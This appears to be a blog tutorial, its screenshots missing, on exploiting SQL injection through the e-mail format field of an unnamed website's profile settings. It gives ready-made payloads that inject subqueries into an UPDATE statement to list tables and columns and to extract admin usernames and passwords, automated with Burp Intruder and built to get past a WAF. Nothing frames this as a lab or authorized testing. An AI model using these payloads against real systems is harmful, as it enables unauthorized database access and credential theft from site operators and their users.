SQL injection inside UPDATE query [Tutorial]
This tutorial will help you with SQLi inside UPDATE query. SQLi is located in profile settings.Picture of settings panel:[caption id="" align="aligncenter" width="217"] click image to enlarge[/caption]Vulnerable parameter is "E-mail format: " value. We use Temper data to intercept and change values.Picture of intercepted values:
After we click "ok" we get this.Picture of MySQL error:
First we wan to find database version,but what would be the easiest way.We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).Picture of version query:
Picture of rendered content with database answer:
Now that we know how to create our quer lets get tables.Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = 'Picture of get tables query:
Picture of rendered content with database answer:
Three tables, strange!? Let's check that again. We use count.Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = 'Picture of get tables count query:
Picture of rendered content with database answer:
Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = 'Picture of burp settings:
[caption id="" align="aligncenter" width="320"]
click image to enlarge[/caption]
That's all, and now you just get columns the same way with Burp Suite.Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = 'Just increment n with Burp Suite.Values :Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = 'Just increment n with Burp Suite.That's it. Simple, yet effective. I used this because, waf blocked -- and --+ so I wasn't able to close and comment out query.I hope you enjoyed this article and look forward to doing more. Let me know what you think in the comments :)